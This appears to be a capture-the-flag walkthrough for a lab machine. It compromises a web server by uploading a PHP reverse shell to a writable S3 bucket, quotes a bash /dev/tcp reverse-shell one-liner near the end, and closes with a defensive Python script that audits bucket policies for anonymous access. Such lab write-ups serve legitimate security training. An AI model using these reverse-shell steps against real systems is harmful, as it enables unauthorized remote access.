How many TCP ports are open?
Answer : 2
What is the domain of the email address provided in the "Contact" section of the website?
Answer : thetoppers.htb
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
Answer : /etc/hosts
We already covered this in the Responder box, but it's always good to have a reminder.
Which sub-domain is discovered during further enumeration?
A cool thing about gobuster: it can enumerate subdomains too!
Answer : s3.thetoppers.htb
Don't forget to add it to /etc/hosts.
Which service is running on the discovered sub-domain?
Answer : Amazon S3
S3 (Simple Storage Service) is a scalable object storage service provided by Amazon Web Services (AWS).
Which command line utility can be used to interact with the service running on the discovered sub-domain?
Answer : awscli
Which command is used to set up the AWS CLI installation?
Answer : aws configure
Enter some random values at the prompts, as we don't have real ones.
What is the command used by the above utility to list all of the S3 buckets?
Answer : aws s3 ls
This server is configured to run files written in what web scripting language?
Answer : PHP
Submit root flag
So we can enumerate files on the S3 bucket, but can we upload too? We know the server runs PHP files, so let's create a PHP reverse shell. You can use this great website: Revshells (I encourage you to create it yourself and not put this kind of information on a website, but it's for swiftness purposes). Enter the IP address you want the web server to call (the IP address corresponding to your OpenVPN tunnel), choose a port and take one of the PHP reverse shells.
Put it in a PHP file and upload it to the S3 bucket.
Now let's use netcat to listen on the corresponding port.
And access the uploaded PHP reverse shell file.
We have our reverse shell!
Now you should check some of the usual interesting Linux folders (a non-exhaustive list: /home, /etc, /var/log, /tmp, /proc, /root, /usr/local and more!). A well-known one is /var/www, which is commonly used to store files for web servers.
Answer : Get your own !
It would be a good idea to stabilize your reverse shell, but I'll let you look into that yourself. (You could use a built-in feature like bash -i >& /dev/tcp/10.10.14.191/6001 0>&1 once on the target machine and receive it with another netcat listener.)
Even just spawning a Python pty bash shell improves interaction.
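From the defender's side, the root cause above is a bucket that backs the web root yet accepts listing and upload from a client configured with random values. The following is an added example, not part of the original walkthrough: it audits a bucket policy for grants to anonymous principals. The policy document, bucket name and account ID are constructed samples; in practice the JSON would come from `aws s3api get-bucket-policy`.

```python
import fnmatch
import json

# Capabilities that let a caller enumerate, fetch or plant objects.
RISKY = {"s3:ListBucket": "list", "s3:GetObject": "read", "s3:PutObject": "write"}

# Constructed sample policy (bucket name and account ID are placeholders).
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-webroot", "arn:aws:s3:::example-webroot/*"]},
    {"Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:Put*", "Resource": "arn:aws:s3:::example-webroot/*"},
    {"Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:role/deploy"},
     "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-webroot/*"},
]})

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    # Both "*" and {"AWS": "*"} mean "anyone", so any credentials work.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def anonymous_grants(policy_json):
    """Return sorted (capability, resource) pairs granted to everyone."""
    findings = set()
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # conditional grants need manual review; not flagged here
        for pattern in _as_list(stmt.get("Action", [])):
            for action, capability in RISKY.items():
                # Action names are case-insensitive and may contain wildcards.
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    for resource in _as_list(stmt.get("Resource", [])):
                        findings.add((capability, resource))
    return sorted(findings)

if __name__ == "__main__":
    for capability, resource in anonymous_grants(SAMPLE_POLICY):
        print(f"anonymous {capability:5} -> {resource}")
```

An anonymous "write" finding on a bucket whose objects are served by a PHP-executing web server is the exact condition this box depends on. Bucket ACLs are a separate grant path that this check does not cover.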